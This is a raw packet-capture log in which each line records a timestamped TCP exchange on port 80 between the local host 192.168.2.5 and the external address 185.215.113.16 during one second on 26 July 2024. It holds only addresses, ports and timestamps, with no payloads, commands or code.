Jul 26, 2024 17:56:22.577079058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.577238083 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.577238083 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.585138083 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.585153103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.585215092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.585215092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.601582050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.601608992 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.601624012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.601638079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.603375912 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.603375912 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.608788967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.608803034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.608824015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.608855963 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.609072924 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.614698887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.614712954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.620515108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.620970011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.620982885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.621051073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.627531052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.627543926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.627583027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.627659082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.634150028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.634172916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.634183884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.634300947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.634300947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.640221119 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.640237093 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.640271902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.646344900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.646358967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.646608114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.646608114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.651946068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.651961088 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.652051926 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.652051926 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.656397104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.656410933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.656466961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.661565065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.661578894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.661601067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.661685944 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.661685944 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.666735888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.666749001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.666882038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.673877954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.673891068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.674664021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.676261902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.676279068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.676417112 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.676417112 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.680464029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.680478096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.680521011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.680568933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.680625916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.684653044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.684669018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.684689999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.685201883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.685201883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.689853907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.690402031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.690992117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.691004992 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.692513943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.695214033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.695225954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.695931911 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.699696064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.699708939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.699845076 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.699845076 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.702888012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.702900887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.702924013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.702996016 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.702996016 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.706371069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.706383944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.706449032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.706449032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.709809065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.709820986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.709980965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.709980965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.713920116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.713932991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.714019060 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.716161966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.716175079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.716228962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.716504097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.718904018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.718916893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.718938112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.718997955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.718997955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.721761942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.721780062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.722037077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.722037077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.724565983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.724579096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.724669933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.724669933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.727411032 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.727421999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.727464914 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.728502035 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.730731964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.730745077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.730767012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.730909109 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.730910063 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.735785961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.735799074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.735846043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.735868931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.735881090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.735898972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.735976934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.735976934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.743670940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.743685007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.743741989 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.753199100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.753243923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.753283024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.753283024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.762696981 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.762723923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.762754917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.762813091 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.762813091 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.764434099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.764509916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.764770985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.766520023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.766571999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.766619921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.766619921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.771905899 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.771959066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.771991968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.771991968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.772057056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.772074938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.772074938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.772197962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.777528048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.777580023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.777604103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.777647972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.777674913 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.777698994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.777812958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.779558897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.779663086 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.779716969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.779805899 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.781841993 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.781893015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.781898022 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.782947063 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.784106016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.784157038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.784346104 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.784347057 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.786335945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.786386967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.788503885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.788721085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.788767099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.788790941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.788876057 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.790890932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.790925980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.790957928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.791035891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.791035891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.791115999 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.793170929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.793206930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.795377016 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.795388937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.795423985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.797647953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.797682047 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.797709942 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.797758102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.797758102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.799803972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.799839020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.799868107 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.799871922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.799912930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.799942970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.801565886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.801599026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.801661015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.801661015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.803423882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.803457022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.803503036 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.803503036 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.805146933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.805181980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.805227995 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.805227995 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.807054043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.807086945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.807226896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.807226896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.809392929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.809469938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.809495926 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.809521914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.809529066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.809636116 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.810514927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.810575008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.810621977 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.810621977 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.812304974 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.812329054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.812504053 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.812504053 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.813827991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.813846111 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.813882113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.815280914 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.816427946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.816442966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.816464901 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.816477060 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.816525936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.816525936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.817220926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.817234039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.817311049 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.818545103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.818557978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.818593025 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.819962978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.820029020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.820029020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.820728064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.820740938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.820833921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.822170973 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.822184086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.822206974 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.822237015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.822237015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.822496891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.823616028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.823632956 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.823653936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.823664904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.824032068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.824032068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.825098038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.825112104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.825156927 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.825186968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.827073097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.827088118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.827327967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.827327967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.827651978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.827670097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.827689886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.828155994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.828155994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.832895041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.833048105 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.834063053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.834076881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.834145069 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.834145069 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.835321903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.835334063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.835355997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.835520983 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.835520983 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.836848974 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.836869001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.836936951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.838701963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.838716030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.838788986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.838788986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.841196060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.841221094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.841233015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.841249943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.841255903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.841295004 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.842298031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.842300892 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.842309952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.842327118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.843395948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.843409061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.843434095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.843434095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.843631029 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.844768047 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.844779015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.844831944 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.846014023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.846029043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.846262932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.846262932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.847516060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.847531080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.847553015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.847594023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.847594023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.849502087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.849514961 CEST	80	49705	185.215.113.16	192.168.2.5
